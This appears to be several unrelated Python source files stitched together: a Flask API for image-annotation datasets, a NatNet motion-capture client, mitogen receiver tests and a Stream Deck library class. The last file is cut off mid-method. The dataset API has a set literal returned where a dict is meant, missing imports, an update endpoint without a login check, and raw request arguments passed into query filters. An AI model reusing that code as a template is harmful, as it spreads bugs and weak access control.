from threading import Thread
from google_images_download import google_images_download as gid
from ..util.pagination_util import Pagination
from ..util import query_util, coco_util, profile
from database import (
ImageModel,
DatasetModel,
CategoryModel,
AnnotationModel,
ExportModel
)
import datetime
import json
import os
api = Namespace('dataset', description='Dataset related operations')
dataset_create = reqparse.RequestParser()
dataset_create.add_argument('name', required=True)
dataset_create.add_argument('categories', type=list, required=False, location='json',
help="List of default categories for sub images")
page_data = reqparse.RequestParser()
page_data.add_argument('page', default=1, type=int)
page_data.add_argument('limit', default=20, type=int)
page_data.add_argument('folder', default='', help='Folder for data')
page_data.add_argument('order', default='file_name', help='Order to display images')
delete_data = reqparse.RequestParser()
delete_data.add_argument('fully', default=False, type=bool,
help="Fully delete dataset (no undo)")
coco_upload = reqparse.RequestParser()
coco_upload.add_argument('coco', location='files', type=FileStorage, required=True, help='Json coco')
export = reqparse.RequestParser()
export.add_argument('categories', type=str, default=None, required=False, help='Ids of categories to export')
export.add_argument('with_empty_images', type=inputs.boolean, default=False, required=False, help='Export with un-annotated images')
update_dataset = reqparse.RequestParser()
update_dataset.add_argument('categories', location='json', type=list, help="New list of categories")
update_dataset.add_argument('default_annotation_metadata', location='json', type=dict,
help="Default annotation metadata")
dataset_generate = reqparse.RequestParser()
dataset_generate.add_argument('keywords', location='json', type=list, default=[],
help="Keywords associated with images")
dataset_generate.add_argument('limit', location='json', type=int, default=100, help="Number of images per keyword")
share = reqparse.RequestParser()
share.add_argument('users', location='json', type=list, default=[], help="List of users")
@api.route('/')
class Dataset(Resource):
@login_required
def get(self):
""" Returns all datasets """
return query_util.fix_ids(current_user.datasets.filter(deleted=False).all())
@api.expect(dataset_create)
@login_required
def post(self):
""" Creates a dataset """
args = dataset_create.parse_args()
name = args['name']
categories = args.get('categories', [])
category_ids = CategoryModel.bulk_create(categories)
try:
dataset = DatasetModel(name=name, categories=category_ids)
dataset.save()
except NotUniqueError:
return {'message': 'Dataset already exists. Check the undo tab to fully delete the dataset.'}, 400
return query_util.fix_ids(dataset)
def download_images(output_dir, args):
for keyword in args['keywords']:
response = gid.googleimagesdownload()
response.download({
"keywords": keyword,
"limit": args['limit'],
"output_directory": output_dir,
"no_numbering": True,
"format": "jpg",
"type": "photo",
"print_urls": False,
"print_paths": False,
"print_size": False
})
@api.route('/<int:dataset_id>/generate')
class DatasetGenerate(Resource):
@api.expect(dataset_generate)
@login_required
def post(self, dataset_id):
""" Adds images found on google to the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
if not dataset.is_owner(current_user):
return {"message": "You do not have permission to download the dataset's annotations"}, 403
thread = Thread(target=download_images, args=(dataset.directory, args))
thread.start()
return {"success": True}
@api.route('/<int:dataset_id>/users')
class DatasetMembers(Resource):
@login_required
def get(self, dataset_id):
""" All users in the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
users = dataset.get_users()
return query_util.fix_ids(users)
@api.route('/<int:dataset_id>/reset/metadata')
class DatasetCleanMeta(Resource):
@login_required
def get(self, dataset_id):
""" All users in the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
AnnotationModel.objects(dataset_id=dataset.id)\
.update(metadata=dataset.default_annotation_metadata)
ImageModel.objects(dataset_id=dataset.id)\
.update(metadata={})
return {'success': True}
@api.route('/<int:dataset_id>/stats')
class DatasetStats(Resource):
@login_required
def get(self, dataset_id):
""" All users in the dataset """
args = dataset_generate.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
images = ImageModel.objects(dataset_id=dataset.id, deleted=False)
annotated_images = images.filter(annotated=True)
annotations = AnnotationModel.objects(dataset_id=dataset_id, deleted=False)
# Calculate annotation counts by category in this dataset
category_count = dict()
image_category_count = dict()
for category in dataset.categories:
# Calculate the annotation count in the current category in this dataset
cat_name = CategoryModel.objects(id=category).first()['name']
cat_count = AnnotationModel.objects(dataset_id=dataset_id, category_id=category, deleted=False).count()
category_count.update({str(cat_name): cat_count})
# Calculate the annotated images count in the current category in this dataset
image_count = len(AnnotationModel.objects(dataset_id=dataset_id, category_id=category, deleted=False).distinct('image_id'))
image_category_count.update({str(cat_name): image_count})
stats = {
'total': {
'Users': dataset.get_users().count(),
'Images': images.count(),
'Annotated Images': annotated_images.count(),
'Annotations': annotations.count(),
'Categories': len(dataset.categories),
'Time Annotating (s)': (images.sum('milliseconds') or 0) / 1000
},
'average': {
'Image Size (px)': images.average('width'),
'Image Height (px)': images.average('height'),
'Annotation Area (px)': annotations.average('area'),
'Time (ms) per Image': images.average('milliseconds') or 0,
'Time (ms) per Annotation': annotations.average('milliseconds') or 0
},
'categories': category_count,
'images_per_category': image_category_count
}
return stats
@api.route('/<int:dataset_id>')
class DatasetId(Resource):
@login_required
def delete(self, dataset_id):
""" Deletes dataset by ID (only owners)"""
dataset = DatasetModel.objects(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
if not current_user.can_delete(dataset):
return {"message": "You do not have permission to delete the dataset"}, 403
dataset.update(set__deleted=True, set__deleted_date=datetime.datetime.now())
return {"success": True}
@api.expect(update_dataset)
def post(self, dataset_id):
""" Updates dataset by ID """
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
args = update_dataset.parse_args()
categories = args.get('categories')
default_annotation_metadata = args.get('default_annotation_metadata')
set_default_annotation_metadata = args.get('set_default_annotation_metadata')
if categories is not None:
dataset.categories = CategoryModel.bulk_create(categories)
if default_annotation_metadata is not None:
update = {}
for key, value in default_annotation_metadata.items():
if key not in dataset.default_annotation_metadata:
update[f'set__metadata__{key}'] = value
dataset.default_annotation_metadata = default_annotation_metadata
if len(update.keys()) > 0:
AnnotationModel.objects(dataset_id=dataset.id, deleted=False)\
.update(**update)
dataset.update(
categories=dataset.categories,
default_annotation_metadata=dataset.default_annotation_metadata
)
return {"success": True}
@api.route('/<int:dataset_id>/share')
class DatasetIdShare(Resource):
@api.expect(share)
@login_required
def post(self, dataset_id):
args = share.parse_args()
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {"message": "Invalid dataset id"}, 400
if not dataset.is_owner(current_user):
return {"message": "You do not have permission to share this dataset"}, 403
dataset.update(users=args.get('users'))
return {"success": True}
@api.route('/data')
class DatasetData(Resource):
@api.expect(page_data)
@login_required
def get(self):
""" Endpoint called by dataset viewer client """
args = page_data.parse_args()
limit = args['limit']
page = args['page']
folder = args['folder']
datasets = current_user.datasets.filter(deleted=False)
pagination = Pagination(datasets.count(), limit, page)
datasets = datasets[pagination.start:pagination.end]
datasets_json = []
for dataset in datasets:
dataset_json = query_util.fix_ids(dataset)
images = ImageModel.objects(dataset_id=dataset.id, deleted=False)
dataset_json['numberImages'] = images.count()
dataset_json['numberAnnotated'] = images.filter(annotated=True).count()
dataset_json['permissions'] = dataset.permissions(current_user)
first = images.first()
if first is not None:
dataset_json['first_image_id'] = images.first().id
datasets_json.append(dataset_json)
return {
"pagination": pagination.export(),
"folder": folder,
"datasets": datasets_json,
"categories": query_util.fix_ids(current_user.categories.filter(deleted=False).all())
}
@api.route('/<int:dataset_id>/data')
class DatasetDataId(Resource):
@profile
@api.expect(page_data)
@login_required
def get(self, dataset_id):
""" Endpoint called by image viewer client """
parsed_args = page_data.parse_args()
per_page = parsed_args.get('limit')
page = parsed_args.get('page') - 1
folder = parsed_args.get('folder')
order = parsed_args.get('order')
args = dict(request.args)
# Check if dataset exists
dataset = current_user.datasets.filter(id=dataset_id, deleted=False).first()
if dataset is None:
return {'message', 'Invalid dataset id'}, 400
# Make sure folder starts with is in proper format
if len(folder) > 0:
folder = folder[0].strip('/') + folder[1:]
if folder[-1] != '/':
folder = folder + '/'
# Get directory
directory = os.path.join(dataset.directory, folder)
if not os.path.exists(directory):
return {'message': 'Directory does not exist.'}, 400
# Remove parsed arguments
for key in parsed_args:
args.pop(key, None)
# Generate query from remaining arugments
query = {}
for key, value in args.items():
lower = value.lower()
if lower in ["true", "false"]:
value = json.loads(lower)
if len(lower) != 0:
query[key] = value
# Change category_ids__in to list
if 'category_ids__in' in query.keys():
query['category_ids__in'] = [int(x) for x in query['category_ids__in'].split(',')]
# Initialize mongo query with required elements:
query_build = Q(dataset_id=dataset_id)
query_build &= Q(path__startswith=directory)
query_build &= Q(deleted=False)
# Define query names that should use complex logic:
complex_query = ['annotated', 'category_ids__in']
# Add additional 'and' arguments to mongo query that do not require complex_query logic
for key in query.keys():
if key not in complex_query:
query_dict = {}
query_dict[key] = query[key]
query_build &= Q(**query_dict)
# Add additional arguments to mongo query that require more complex logic to construct
if 'annotated' in query.keys():
if 'category_ids__in' in query.keys() and query['annotated']:
# Only show annotated images with selected category_ids
query_dict = {}
query_dict['category_ids__in'] = query['category_ids__in']
query_build &= Q(**query_dict)
else:
# Only show non-annotated images
query_dict = {}
query_dict['annotated'] = query['annotated']
query_build &= Q(**query_dict)
elif 'category_ids__in' in query.keys():
# Ahow annotated images with selected category_ids or non-annotated images
query_dict_1 = {}
query_dict_1['category_ids__in'] = query['category_ids__in']
query_dict_2 = {}
query_dict_2['annotated'] = False
query_build &= (Q(**query_dict_1) | Q(**query_dict_2))
# Perform mongodb query
images = current_user.images \
.filter(query_build) \
.order_by(order).only('id', 'file_name', 'annotating', 'annotated', 'num_annotations')
total = images.count()
pages = int(total/per_page) + 1
images = images.skip(page*per_page).limit(per_page)
images_json = query_util.fix_ids(images)
# for image in images:
# image_json = query_util.fix_ids(image)
# query = AnnotationModel.objects(image_id=image.id, deleted=False)
# category_ids = query.distinct('category_id')
# categories = CategoryModel.objects(id__in=category_ids).only('name', 'color')
# image_json['annotations'] = query.count()
# image_json['categories'] = query_util.fix_ids(categories)
# images_json.append(image_json)
subdirectories = [f for f in sorted(os.listdir(directory))
if os.path.isdir(directory + f) and not f.startswith('.')]
categories = CategoryModel.objects(id__in=dataset.categories).only('id', 'name')
return {
"total": total,
"per_page": per_page,
"pages": pages,
"page": page,
"images": images_json,
"folder": folder,
"directory": directory,
"dataset": query_util.fix_ids(dataset),
"categories": query_util.fix_ids(categories),
"subdirectories": subdirectories
}
@api.route('/<int:dataset_id>/exports')
class DatasetExports(Resource):
@login_required
def get(self, dataset_id):
""" Returns exports of images and annotations in the dataset (only owners) """
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {"message": "Invalid dataset ID"}, 400
if not current_user.can_download(dataset):
return {"message": "You do not have permission to download the dataset's annotations"}, 403
exports = ExportModel.objects(dataset_id=dataset.id).order_by('-created_at').limit(50)
dict_export = []
for export in exports:
time_delta = datetime.datetime.utcnow() - export.created_at
dict_export.append({
'id': export.id,
'ago': query_util.td_format(time_delta),
'tags': export.tags
})
return dict_export
@api.route('/<int:dataset_id>/export')
class DatasetExport(Resource):
@api.expect(export)
@login_required
def get(self, dataset_id):
args = export.parse_args()
categories = args.get('categories')
with_empty_images = args.get('with_empty_images', False)
if len(categories) == 0:
categories = []
if len(categories) > 0 or isinstance(categories, str):
categories = [int(c) for c in categories.split(',')]
dataset = DatasetModel.objects(id=dataset_id).first()
if not dataset:
return {'message': 'Invalid dataset ID'}, 400
return dataset.export_coco(categories=categories, with_empty_images=with_empty_images)
@api.expect(coco_upload)
@login_required
def post(self, dataset_id):
""" Adds coco formatted annotations to the dataset """
args = coco_upload.parse_args()
coco = args['coco']
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {'message': 'Invalid dataset ID'}, 400
return dataset.import_coco(json.load(coco))
@api.route('/<int:dataset_id>/coco')
class DatasetCoco(Resource):
@login_required
def get(self, dataset_id):
""" Returns coco of images and annotations in the dataset (only owners) """
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {"message": "Invalid dataset ID"}, 400
if not current_user.can_download(dataset):
return {"message": "You do not have permission to download the dataset's annotations"}, 403
return coco_util.get_dataset_coco(dataset)
@api.expect(coco_upload)
@login_required
def post(self, dataset_id):
""" Adds coco formatted annotations to the dataset """
args = coco_upload.parse_args()
coco = args['coco']
dataset = current_user.datasets.filter(id=dataset_id).first()
if dataset is None:
return {'message': 'Invalid dataset ID'}, 400
return dataset.import_coco(json.load(coco))
@api.route('/coco/<int:import_id>')
class DatasetCocoId(Resource):
@login_required
def get(self, import_id):
""" Returns current progress and errors of a coco import """
coco_import = CocoImportModel.objects(
id=import_id, creator=current_user.username).first()
if not coco_import:
return {'message': 'No such coco import'}, 400
return {
"progress": coco_import.progress,
"errors": coco_import.errors
}
@api.route('/<int:dataset_id>/scan')
class DatasetScan(Resource):
@login_required
def get(self, dataset_id):
dataset = DatasetModel.objects(id=dataset_id).first()
if not dataset:
return {'message': 'Invalid dataset ID'}, 400
return dataset.scan()
|
nat_net_client.py
|
import socket
from threading import Thread
import time
from typing import Optional
from .data_frame import DataFrame
from .event import Event
from .server_info import ServerInfo
from .data_descriptions import DataDescriptions
from .packet_buffer import PacketBuffer
from .version import Version
class NatNetError(Exception):
pass
class NatNetProtocolError(NatNetError):
pass
class NatNetClient:
# Client/server message ids
NAT_CONNECT = 0
NAT_SERVERINFO = 1
NAT_REQUEST = 2
NAT_RESPONSE = 3
NAT_REQUEST_MODELDEF = 4
NAT_MODELDEF = 5
NAT_REQUEST_FRAMEOFDATA = 6
NAT_FRAMEOFDATA = 7
NAT_MESSAGESTRING = 8
NAT_DISCONNECT = 9
NAT_KEEPALIVE = 10
NAT_UNRECOGNIZED_REQUEST = 100
def __init__(self, server_ip_address: str = "127.0.0.1", local_ip_address: str = "127.0.0.1",
multicast_address: str = "239.255.42.99", command_port: int = 1510, data_port: int = 1511,
use_multicast: bool = True):
self.__server_ip_address = server_ip_address
self.__local_ip_address = local_ip_address
self.__multicast_address = multicast_address
self.__command_port = command_port
self.__data_port = data_port
self.__use_multicast = use_multicast
self.__server_info = None
# NatNet stream version. This will be updated to the actual version the server is using during runtime.
self.__current_protocol_version: Optional[Version] = None
self.__command_thread = None
self.__data_thread = None
self.__command_socket: Optional[socket.socket] = None
self.__data_socket: Optional[socket.socket] = None
self.__stop_threads = False
self.__on_data_frame_received_event = Event()
self.__on_data_description_received_event = Event()
@property
def connected(self):
return self.__command_socket is not None and self.__data_socket is not None and self.__server_info is not None
# Create a command socket to attach to the NatNet stream
def __create_command_socket(self):
if self.__use_multicast:
# Multicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# allow multiple clients on same machine to use multicast group address/port
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
result.bind(("", 0))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
# set to broadcast mode
result.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
else:
# Unicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
try:
result.bind((self.__local_ip_address, 0))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.settimeout(0.0)
return result
# Create a data socket to attach to the NatNet stream
def __create_data_socket(self, port):
if self.__use_multicast:
# Multicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) # UDP
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.__multicast_address) + socket.inet_aton(self.__local_ip_address))
try:
result.bind((self.__local_ip_address, port))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
else:
# Unicast case
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
result.bind(("", 0))
except socket.error as ex:
print("Command socket error occurred:\n{}\nCheck Motive/Server mode requested mode agreement. "
"You requested Multicast".format(ex))
if self.__multicast_address != "255.255.255.255":
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.__multicast_address) + socket.inet_aton(
self.__local_ip_address))
result.settimeout(0.0)
return result
def __socket_thread_func(self, in_socket: socket.socket, recv_buffer_size: int = 64 * 1024,
send_keep_alive: bool = False):
while not self.__stop_threads:
# Use timeout to ensure that thread can terminate
self.__process_socket(in_socket, recv_buffer_size=recv_buffer_size, send_keep_alive=send_keep_alive)
def __process_socket(self, in_socket: socket.socket, recv_buffer_size: int = 64 * 1024,
send_keep_alive: bool = False):
if send_keep_alive:
self.send_request(self.NAT_KEEPALIVE)
try:
data, addr = in_socket.recvfrom(recv_buffer_size)
if len(data) > 0:
self.__process_message(PacketBuffer(data))
return True
except (BlockingIOError, socket.timeout):
pass
return False
def __process_message(self, buffer: PacketBuffer):
message_id = buffer.read_uint16()
packet_size = buffer.read_uint16()
if len(buffer.data) - 4 != packet_size:
print("Warning: actual packet size ({}) not consistent with packet size in the header ({})".format(
len(buffer.data) - 4, packet_size))
if message_id == self.NAT_FRAMEOFDATA:
data_frame = DataFrame.read_from_buffer(buffer, self.__current_protocol_version)
self.__on_data_frame_received_event.call(data_frame)
elif message_id == self.NAT_MODELDEF:
data_descs = DataDescriptions.read_from_buffer(buffer, self.__current_protocol_version)
self.__on_data_description_received_event.call(data_descs)
elif message_id == self.NAT_SERVERINFO:
self.__server_info = ServerInfo.read_from_buffer(buffer, self.__current_protocol_version)
self.__current_protocol_version = self.__server_info.nat_net_protocol_version
return message_id
def send_request(self, command: int, command_str: str = ""):
if command in [self.NAT_REQUEST_MODELDEF, self.NAT_REQUEST_FRAMEOFDATA, self.NAT_KEEPALIVE]:
command_str = ""
if command == self.NAT_CONNECT:
command_str = "Ping"
packet_size = len(command_str) + 1
data = command.to_bytes(2, byteorder="little")
data += packet_size.to_bytes(2, byteorder="little")
data += command_str.encode("utf-8")
data += b"\0"
return self.__command_socket.sendto(data, (self.__server_ip_address, self.__command_port))
def request_modeldef(self):
self.send_request(self.NAT_REQUEST_MODELDEF)
def send_command(self, command_str: str):
if not self.connected:
raise NatNetError("NatNet client is not connected to a server.")
return self.send_request(self.NAT_REQUEST, command_str)
def connect(self, timeout: float = 5.0):
if not self.connected:
self.__data_socket = self.__create_data_socket(self.__data_port)
self.__command_socket = self.__create_command_socket()
# Get NatNet and server versions
self.send_request(self.NAT_CONNECT)
start_time = time.time()
while self.__server_info is None:
# Waiting for reply from server
self.__process_socket(self.__command_socket, send_keep_alive=not self.__use_multicast)
if (time.time() - start_time) >= timeout:
self.shutdown()
raise TimeoutError()
time.sleep(0.1)
def run_async(self):
if not self.running_asynchronously:
self.__stop_threads = False
# To ensure that threads can terminate
self.__data_socket.settimeout(0.1)
self.__command_socket.settimeout(0.1)
# Create a separate thread for receiving data packets
self.__data_thread = Thread(target=self.__socket_thread_func, args=(self.__data_socket,))
self.__data_thread.start()
# Create a separate thread for receiving command packets
self.__command_thread = Thread(
target=self.__socket_thread_func, args=(self.__command_socket,),
kwargs={"send_keep_alive": not self.__use_multicast})
self.__command_thread.start()
def stop_async(self):
if self.running_asynchronously:
self.__stop_threads = True
if self.__command_thread is not None:
self.__command_thread.join()
if self.__data_thread is not None:
self.__data_thread.join()
self.__command_thread = self.__data_thread = None
self.__data_socket.settimeout(0.0)
self.__command_socket.settimeout(0.0)
def update_sync(self):
assert not self.running_asynchronously, "Cannot update synchronously while running asynchronously."
while self.__process_socket(self.__data_socket):
pass
while self.__process_socket(self.__command_socket, send_keep_alive=not self.__use_multicast):
pass
def shutdown(self):
self.stop_async()
if self.__command_socket is not None:
self.__command_socket.close()
if self.__data_socket is not None:
self.__data_socket.close()
self.__command_socket = self.__data_socket = self.__server_info = None
def __enter__(self):
self.connect()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@property
def on_data_frame_received_event(self) -> Event:
return self.__on_data_frame_received_event
@property
def on_data_description_received_event(self) -> Event:
return self.__on_data_description_received_event
@property
def server_info(self) -> Optional[ServerInfo]:
return self.__server_info
@property
def can_change_protocol_version(self) -> bool:
if self.__server_info is not None:
return self.__server_info.nat_net_protocol_version >= Version(4) and not self.__use_multicast
return False
@property
def protocol_version(self) -> Optional[Version]:
return self.__current_protocol_version
@protocol_version.setter
def protocol_version(self, desired_version: Version):
if not self.can_change_protocol_version:
raise NatNetProtocolError("Server does not support changing the NatNet protocol version.")
desired_version = desired_version.truncate(2)
if self.can_change_protocol_version and desired_version != self.__current_protocol_version.truncate(2):
sz_command = "Bitstream,{}".format(desired_version)
return_code = self.send_command(sz_command)
if return_code >= 0:
self.__current_protocol_version = desired_version
self.send_command("TimelinePlay")
time.sleep(0.1)
for cmd in ["TimelinePlay", "TimelineStop", "SetPlaybackCurrentFrame,0", "TimelineStop"]:
self.send_command(cmd)
time.sleep(2)
else:
raise NatNetProtocolError("Failed to set NatNet protocol version")
@property
def server_ip_address(self) -> str:
return self.__server_ip_address
@property
def local_ip_address(self) -> str:
return self.__local_ip_address
@property
def multicast_address(self) -> str:
return self.__multicast_address
@property
def command_port(self) -> int:
return self.__command_port
@property
def data_port(self) -> int:
return self.__data_port
@property
def use_multicast(self) -> bool:
return self.__use_multicast
@property
def running_asynchronously(self):
return self.__command_thread is not None or self.__data_thread is not None
|
receiver_test.py
|
import sys
import threading
import unittest
import mitogen.core
import testlib
def yield_stuff_then_die(sender):
for x in range(5):
sender.send(x)
sender.close()
return 10
class ConstructorTest(testlib.RouterMixin, testlib.TestCase):
def test_handle(self):
recv = mitogen.core.Receiver(self.router)
self.assertTrue(isinstance(recv.handle, int))
self.assertTrue(recv.handle > 100)
self.router.route(
mitogen.core.Message.pickled(
'hi',
dst_id=0,
handle=recv.handle,
)
)
self.assertEqual('hi', recv.get().unpickle())
class IterationTest(testlib.RouterMixin, testlib.TestCase):
def test_dead_stops_iteration(self):
recv = mitogen.core.Receiver(self.router)
fork = self.router.local()
ret = fork.call_async(yield_stuff_then_die, recv.to_sender())
self.assertEqual(list(range(5)), list(m.unpickle() for m in recv))
self.assertEqual(10, ret.get().unpickle())
def iter_and_put(self, recv, latch):
try:
for msg in recv:
latch.put(msg)
except Exception:
latch.put(sys.exc_info()[1])
def test_close_stops_iteration(self):
recv = mitogen.core.Receiver(self.router)
latch = mitogen.core.Latch()
t = threading.Thread(
target=self.iter_and_put,
args=(recv, latch),
)
t.start()
t.join(0.1)
recv.close()
t.join()
self.assertTrue(latch.empty())
class CloseTest(testlib.RouterMixin, testlib.TestCase):
def wait(self, latch, wait_recv):
try:
latch.put(wait_recv.get())
except Exception:
latch.put(sys.exc_info()[1])
def test_closes_one(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
t = threading.Thread(target=lambda: self.wait(latch, wait_recv))
t.start()
wait_recv.close()
def throw():
raise latch.get()
t.join()
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)
def test_closes_all(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
ts = [
threading.Thread(target=lambda: self.wait(latch, wait_recv))
for x in range(5)
]
for t in ts:
t.start()
wait_recv.close()
def throw():
raise latch.get()
for x in range(5):
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)
for t in ts:
t.join()
class OnReceiveTest(testlib.RouterMixin, testlib.TestCase):
# Verify behaviour of _on_receive dead message handling. A dead message
# should unregister the receiver and wake all threads.
def wait(self, latch, wait_recv):
try:
latch.put(wait_recv.get())
except Exception:
latch.put(sys.exc_info()[1])
def test_sender_closes_one_thread(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
t = threading.Thread(target=lambda: self.wait(latch, wait_recv))
t.start()
sender = wait_recv.to_sender()
sender.close()
def throw():
raise latch.get()
t.join()
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], sender.explicit_close_msg)
@unittest.skip(reason=(
'Unclear if a asingle dead message received from remote should '
'cause all threads to wake up.'
))
def test_sender_closes_all_threads(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
ts = [
threading.Thread(target=lambda: self.wait(latch, wait_recv))
for x in range(5)
]
for t in ts:
t.start()
sender = wait_recv.to_sender()
sender.close()
def throw():
raise latch.get()
for x in range(5):
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)
for t in ts:
t.join()
# TODO: what happens to a Select subscribed to the receiver in this case?
class ToSenderTest(testlib.RouterMixin, testlib.TestCase):
klass = mitogen.core.Receiver
def test_returned_context(self):
myself = self.router.myself()
recv = self.klass(self.router)
self.assertEqual(myself, recv.to_sender().context)
|
StreamDeck.py
|
# Python Stream Deck Library
# Released under the MIT license
#
# dean [at] fourwalledcubicle [dot] com
# www.fourwalledcubicle.com
#
import threading
import time
from abc import ABC, abstractmethod
from ..Transport.Transport import TransportError
class StreamDeck(ABC):
"""
Represents a physically attached StreamDeck device.
"""
KEY_COUNT = None
KEY_COLS = None
KEY_ROWS = None
KEY_PIXEL_WIDTH = None
KEY_PIXEL_HEIGHT = None
KEY_IMAGE_CODEC = None
KEY_FLIP = None
KEY_ROTATION = None
DECK_TYPE = None
def __init__(self, device):
self.device = device
self.last_key_states = [False] * self.KEY_COUNT
self.read_thread = None
self.run_read_thread = False
self.read_poll_hz = 20
self.key_callback = None
self.update_lock = threading.RLock()
def __del__(self):
"""
Delete handler for the StreamDeck, automatically closing the transport
if it is currently open and terminating the transport reader thread.
"""
try:
self._setup_reader(None)
except (TransportError, ValueError):
pass
try:
self.device.close()
except (TransportError):
pass
def __enter__(self):
"""
Enter handler for the StreamDeck, taking the exclusive update lock on
the deck. This can be used in a `with` statement to ensure that only one
thread is currently updating the deck, even if it is doing multiple
operations (e.g. setting the image on multiple keys).
"""
self.update_lock.acquire()
def __exit__(self, type, value, traceback):
"""
Exit handler for the StreamDeck, releasing the exclusive update lock on
the deck.
"""
self.update_lock.release()
@abstractmethod
def _read_key_states(self):
"""
Reads the raw key states from an attached StreamDeck.
:rtype: list(bool)
:return: List containing the raw key states.
"""
pass
@abstractmethod
def _reset_key_stream(self):
"""
Sends a blank key report to the StreamDeck, resetting the key image
streamer in the device. This prevents previously started partial key
writes that were not completed from corrupting images sent from this
application.
"""
pass
def _extract_string(self, data):
"""
Extracts out a human-readable string from a collection of raw bytes,
removing any trailing whitespace or data after the first NUL byte.
"""
return str(bytes(data), 'ascii', 'replace').partition('\0')[0].rstrip()
def _read(self):
"""
Read handler for the underlying transport, listening for button state
changes on the underlying device, caching the new states and firing off
any registered callbacks.
"""
while self.run_read_thread:
try:
new_key_states = self._read_key_states()
if new_key_states is None:
time.sleep(1.0 / self.read_poll_hz)
continue
if self.key_callback is not None:
for k, (old, new) in enumerate(zip(self.last_key_states, new_key_states)):
if old != new:
self.key_callback(self, k, new)
self.last_key_states = new_key_states
except (TransportError):
self.run_read_thread = False
def _setup_reader(self, callback):
"""
Sets up the internal transport reader thread with the given callback,
for asynchronous processing of HID events from the device. If the thread
already exists, it is terminated and restarted with the new callback
function.
:param function callback: Callback to run on the reader thread.
"""
if self.read_thread is not None:
self.run_read_thread = False
self.read_thread.join()
if callback is not None:
self.run_read_thread = True
self.read_thread = threading.Thread(target=callback)
self.read_thread.daemon = True
self.read_thread.start()
def open(self):
"""
Opens the device for input/output. This must be called prior to setting
or retrieving any device state.
.. seealso:: See :func:`~StreamDeck.close` for the corresponding close method.
"""
self.device.open()
self._reset_key_stream()
self._setup_reader(self._read)
def close(self):
"""
Closes the device for input/output.
.. seealso:: See :func:`~StreamDeck.open` for the corresponding open method.
"""
self.device.close()
def connected(self):
"""
Indicates if the physical StreamDeck device this instance is attached to
is still connected to the host.
:rtype: bool
:return: `True` if the deck is still connected, `False` otherwise.
"""
return self.device.connected()
def id(self):
"""
Retrieves the physical ID of the attached StreamDeck. This can be used
to differentiate one StreamDeck from another.
:rtype: str
:return: Identifier for the attached device.
"""
return self.device.path()
def key_count(self):
"""
Retrieves number of physical buttons on the attached StreamDeck device.
:rtype: int
:return: Number of physical buttons.
"""
return self.KEY_COUNT
def deck_type(self):
"""
Retrieves the model of Stream Deck.
:rtype: str
:return: String containing the model name of the StreamDeck device..
"""
return self.DECK_TYPE
def key_layout(self):
"""
Retrieves the physical button layout on the attached StreamDeck device.
:rtype: (int, int)
:return (rows, columns): Number of button rows and columns.
"""
return self.KEY_ROWS, self.KEY_COLS
def key_image_format(self):
"""
Retrieves the image format accepted by the attached StreamDeck device.
Images should be given in this format when setting an image on a button.
.. seealso:: See :func:`~StreamDeck.set_key_image` method to update the
image displayed on a StreamDeck button.
:rtype: dict()
:return: Dictionary describing the various image parameters
(size, image format, image mirroring and rotation).
"""
return {
'size': (self.KEY_PIXEL_WIDTH, self.KEY_PIXEL_HEIGHT),
'format': self.KEY_IMAGE_FORMAT,
'flip': self.KEY_FLIP,
'rotation': self.KEY_ROTATION,
}
def set_poll_frequency(self, hz):
"""
Sets the frequency of the button polling reader thread, determining how
often the StreamDeck will be polled for button changes.
A higher frequency will result in a higher CPU usage, but a lower
latency between a physical button press and a event from the library.
:param int hz: Reader thread frequency, in Hz (1-1000).
"""
